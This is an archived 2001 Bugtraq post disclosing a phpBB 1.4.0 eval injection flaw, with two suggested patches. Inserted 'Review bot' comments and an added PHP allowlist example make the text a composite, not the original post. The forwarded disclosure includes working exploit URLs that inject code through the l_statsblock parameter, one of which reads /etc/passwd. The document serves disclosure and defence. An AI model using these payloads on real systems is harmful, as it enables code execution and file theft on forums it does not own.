Bugtraq mailing list archives
Re: phpBB 1.4.0 bug leads to easy admin privileges
From: "Joao Gouveia" <tharbad () kaotik org>
Date: Sat, 4 Aug 2001 20:10:18 +0100
Hi all,

This is regarding a phpBB security hole found some months ago. Since this one came out, and the other (being a lot worse) didn't, I thought it might have some interest. This applies only to phpBB v1.4.0.

----- Original Message -----
From: "UnderSpell" <underspell () accao net>
To: <james () phpbb com>
Sent: Thursday, May 17, 2001 12:15 PM
Subject: Security bug in phpBB
Hi there! We've recently (actually not so recently) discovered a way to run any code using phpBB. The approach was very simple: at a given point you run an eval, "eval($l_statsblock);". Since $l_statsblock is a language var, we just have to find a way to set ourselves up with an invalid lang file: after login, go to user prefs and
http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile=0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&user=&submit=Gravar+Prefer%EAncias
By this time $l_statsblock is no longer initialized, so we can do funny stuff with it, like:

http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo();

or

http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=include($teste);
and so on... We only checked the phpinfo one against the hack forum and the second against my production and staging boards.

You have two ways to fix this:

1) Check if the lang file exists (when trying to include):

--- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001 +++ phpBB/auth.php Thu May 17 12:11:01 2001 @@ -273,16 +273,19 @@ // Include the appropriate language file. if(!strstr($PHP_SELF, "admin")) { - include('language/lang_'.$default_lang.'.'.$phpEx); + $langfile = 'language/lang_'.$default_lang.'.'.$phpEx; } else { if(strstr($PHP_SELF, "topicadmin")) { - include('language/lang_'.$default_lang.'.'.$phpEx); - } else { - include('../language/lang_'.$default_lang.'.'.$phpEx); - } + $langfile ='language/lang_'.$default_lang.'.'.$phpEx; + } else { + $langfile = '../language/lang_'.$default_lang.'.'.$phpEx; + } } + + if ( ! file_exists($langfile) ) { die("Invalid Language");} + else { include($langfile); } // See if translated pictures are available.. $header_image = get_translated_file($header_image); // See if translated pictures are available.. $header_image = get_translated_file($header_image);

2) Initialize $l_statsblock before trying to include (preferred):

--- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001 +++ phpBB/auth.php Thu May 17 11:39:33 2001 @@ -269,6 +269,7 @@ // set vars for all scripts $now_time = time(); $last_visit = $temptime; +$l_statsblock = ''; // Include the appropriate language file. if(!strstr($PHP_SELF, "admin"))

Credits for this should go to tharbad () kaotik org and UnderSpell () accao net.
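Review bot: in the first patch (the `@@ -273,16 +273,19 @@` hunk), the `file_exists($langfile)` guard added at the end checks the symptom rather than the input: `$default_lang` still reaches the include unvalidated, and the check runs only after prefs.php has already stored the bad value. Suggest validating the name at save time and again here, e.g. `if (!preg_match('/^[a-z0-9_]+$/', $default_lang) || !file_exists($langfile)) { die("Invalid Language"); }`, so the include path is built only from known language names. Two smaller points: `$langfile ='language/...` is missing the space after `=` that the other two assignments have, and the trailing context shows the `// See if translated pictures are available..` / `$header_image = get_translated_file($header_image);` pair twice, which looks like a paste artefact worth checking before the patch is applied.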
(A)UnderSpell
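Review bot: in the second patch (the `@@ -269,6 +269,7 @@` hunk), `+$l_statsblock = '';` pre-initialises only this one variable; any other variable the language file is expected to define, and anything later passed to eval(), can still come from the request when the include fails, because the unknown language name that makes it fail is still accepted by prefs.php. Suggest pairing this line with a check that rejects unknown language names when the preference is saved, rather than relying on each script to default every language variable; and note that the hunk leaves `eval($l_statsblock)` in place, so the contents of every language file remain executable code.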
--- ----- Original Message -----
From: <kill-9 () modernhackers com>
To: <bugtraq () securityfocus com>
Sent: Friday, August 03, 2001 8:51 PM
Subject: phpBB 1.4.0 bug leads to easy admin privileges
-New phpBB 1.4.x exploit

phpBB is an open source bulletin board created by the phpBB group. Version 1.4.x of phpBB has a variable input validation problem that can lead to limited arbitrary SQL queries, including gaining administrative access to the board.
(...)

Best regards,
Joao Gouveia
--------------
tharbad () kaotik org
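The defensive version of what the forwarded message describes, as an added PHP example that is not phpBB's code: the language name is allowlisted against the installed lang_*.php files both when the preference is saved and when it is included, and the variable that is later eval()'d gets a safe default before the include. The directory layout and the function names are assumptions.

```php
<?php
// Added example, not phpBB code. Assumed layout: language files live in
// $langDir as lang_<name>.php; the function names are made up for the example.

// Allowlist built from the files actually installed. A name is accepted only
// if it is plain [a-z0-9_] AND a matching file exists, so a stored preference
// can never point outside $langDir.
function installedLanguages(string $langDir): array {
    $names = [];
    foreach (glob($langDir . '/lang_*.php') ?: [] as $path) {
        if (preg_match('/^lang_([a-z0-9_]+)\.php$/', basename($path), $m)) {
            $names[$m[1]] = true;
        }
    }
    return $names;
}

// What prefs.php should do before saving: reject an unknown name instead of
// storing THIS_IS_AN_INVALID_LANG_FILE and letting the include fail later.
function validateLanguagePreference(string $requested, array $installed, string $fallback = 'english'): string {
    return isset($installed[$requested]) ? $requested : $fallback;
}

// What auth.php should do at include time: same allowlist, and the variable the
// page later relies on ($l_statsblock) gets a safe default before the include,
// so a request parameter under register_globals cannot supply it.
function loadLanguage(string $langDir, string $lang, array $installed): array {
    $l_statsblock = '';
    if (!isset($installed[$lang])) {
        return ['ok' => false, 'l_statsblock' => $l_statsblock];
    }
    include $langDir . '/lang_' . $lang . '.php';   // may assign $l_statsblock
    return ['ok' => true, 'l_statsblock' => $l_statsblock];
}

// Self-check against a constructed temporary language directory.
$dir = sys_get_temp_dir() . '/langdemo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/lang_english.php', "<?php \$l_statsblock = 'Stats block';\n");
$installed = installedLanguages($dir);
assert(validateLanguagePreference('english', $installed) === 'english');
assert(validateLanguagePreference('THIS_IS_AN_INVALID_LANG_FILE', $installed) === 'english');
assert(validateLanguagePreference('../../etc/passwd', $installed) === 'english');
$bad = loadLanguage($dir, 'THIS_IS_AN_INVALID_LANG_FILE', $installed);
assert($bad['ok'] === false && $bad['l_statsblock'] === '');
$good = loadLanguage($dir, 'english', $installed);
assert($good['ok'] === true && $good['l_statsblock'] === 'Stats block');
unlink($dir . '/lang_english.php'); rmdir($dir);
echo "all checks passed\n";
```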